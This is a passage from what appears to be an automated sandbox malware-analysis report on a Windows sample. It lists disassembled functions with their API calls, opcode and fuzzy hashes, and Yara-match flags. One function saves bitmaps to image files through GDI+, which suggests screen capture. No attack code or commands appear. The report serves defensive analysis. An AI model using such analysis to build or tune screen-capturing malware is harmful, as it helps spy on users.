                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                                                                                                                                                                                                            Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                                                                                                                                                                                                            • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                            • String ID: pScheduler
                                                                                                                                                                                                                                            • API String ID: 3657713681-923244539
                                                                                                                                                                                                                                            • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                            • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                                                                                                                                                                                                            Function 024D08F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: H_prolog3_catchmake_shared
                                                                                                                                                                                                                                            • String ID: MOC$RCC$v)D
                                                                                                                                                                                                                                            • API String ID: 3472968176-3108830043
                                                                                                                                                                                                                                            • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                            • Instruction ID: a059737e60c1912a5d80a254c9e92cc3e995245e3c42fc5c9e16dc28c3293416
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FF04FB1A00514DFDB16FF65C4207AD3B65AF15B04F8690D7F4409B260CB785988CFA1
                                                                                                                                                                                                                                            Function 024BB36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                            • Instruction ID: 006eec99376c1a8a1ab609db585910f94663fa29755884bef5d9158dcdecbfbb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18716E719002169BCB228F59C884AFFBBB9FF5575CF54462BEC5157280DB708982CBB2
                                                                                                                                                                                                                                            Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                                                                                                                                                            • Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
                                                                                                                                                                                                                                            Function 024C0CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3033488037-0
                                                                                                                                                                                                                                            • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                            • Instruction ID: 9183baee190f92fe4ff9971f9f8f290bd241a00a6d66dc2720c32f20ba4b289f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56518F79A00304EFDBA19F2ED841B6B77F5EF48724B24556EE809D7250E735E901CB80
                                                                                                                                                                                                                                            Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00430B4F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00430B66
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00430B85
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00430BA0
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00430BB7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3033488037-0
                                                                                                                                                                                                                                            • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                                                                                                                                                            • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                                                                                                                                                                                                            Function 024C1742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                            • Instruction ID: 2e2d82ee6c473176e2bad6a2ac5dec20f0beca9c1cdcd249725ddaaaf771b6d9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B41A33AA012049FCB54DF7DC980A9EB7F6EF85714B2545AED919EB381D731E901CB80
                                                                                                                                                                                                                                            Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                            • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                                                                                                                                                                                                            Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00436922
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 0043698E
                                                                                                                                                                                                                                              • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 313313983-0
                                                                                                                                                                                                                                            • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                            • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                                                                                                                                                                                                            Function 024AB12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _SpinWait.LIBCONCRT ref: 024AB152
                                                                                                                                                                                                                                              • Part of subcall function 024A1188: _SpinWait.LIBCONCRT ref: 024A11A0
                                                                                                                                                                                                                                            • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 024AB166
                                                                                                                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 024AB198
                                                                                                                                                                                                                                            • List.LIBCMT ref: 024AB21B
                                                                                                                                                                                                                                            • List.LIBCMT ref: 024AB22A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3281396844-0
                                                                                                                                                                                                                                            • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                            • Instruction ID: acd93df21eb4b15ecb4f6cc5994a6528f2fc969a13f16d71c1480c1e42205113
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB315232904616DBCB11EFA4C9A06EEBBB2FF34348F04416FC8556B641CB716918CF90
                                                                                                                                                                                                                                            Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                                                                                                                                                                                                              • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                                                                                                                                                                                                            • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                                                                                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                                                                                                                                                                                                            • List.LIBCMT ref: 0041AFB4
                                                                                                                                                                                                                                            • List.LIBCMT ref: 0041AFC3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3281396844-0
                                                                                                                                                                                                                                            • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                            • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                                                                                                                                                                                                            Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                                                                                                                                                                                                            • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                                                                                                                                                                                                            • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                                                                                                                                                                                                            • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                                                                                                                                                                                                            • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2357751836-0
                                                                                                                                                                                                                                            • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                                                                                                                                                            • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                                                                                                                                                                                                            Function 024950C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 024950A3
                                                                                                                                                                                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024950B7
                                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 0249511C
                                                                                                                                                                                                                                            • __Getcoll.LIBCPMT ref: 0249512B
                                                                                                                                                                                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0249513B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2395760641-0
                                                                                                                                                                                                                                            • Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                                                                                                                                                            • Instruction ID: c7e20b2a9d5f9da7fbf1080f6692a72461b94b7456312bff1bfa397b01fbbd0d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 072187B2818204AFDF02EFA5C485BDDBBB1BF54715F60800FE085AB280DBB49648CF95
                                                                                                                                                                                                                                            Function 024C21C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(0249DAD7,0249DAD7,00000002,024BED35,024C3951,00000000,?,024B6A05,00000002,00000000,00000000,00000000,?,0249CF88,0249DAD7,00000004), ref: 024C21CA
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C21FF
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C2226
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,0249DAD7), ref: 024C2233
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,0249DAD7), ref: 024C223C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                            • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                            • Instruction ID: af4d423b540286f04ae6747c2631b2d365bb7bfb51b5fef4bc4894398fa3b5d6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A701D63E2456003BD392AB2D5C44E1B262EABD2B72730012FFC15A6395EFF088028569
                                                                                                                                                                                                                                            Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431F98
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431FBF
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                            • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                            • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                                                                                                                                                                                                            Function 024C2141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C21A0
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                            • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                            • Instruction ID: dfcc6cf2fba9aaa4ec78208e4bd32c16c8d0a72247315e59701b53b6ac32b0ca
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDF0863D2446003BD297772DAC04B5F262A9BC2F62B35022FFD19A23A0EFE185028569
                                                                                                                                                                                                                                            Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                            • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                            • Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
                                                                                                                                                                                                                                            Function 024A7B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
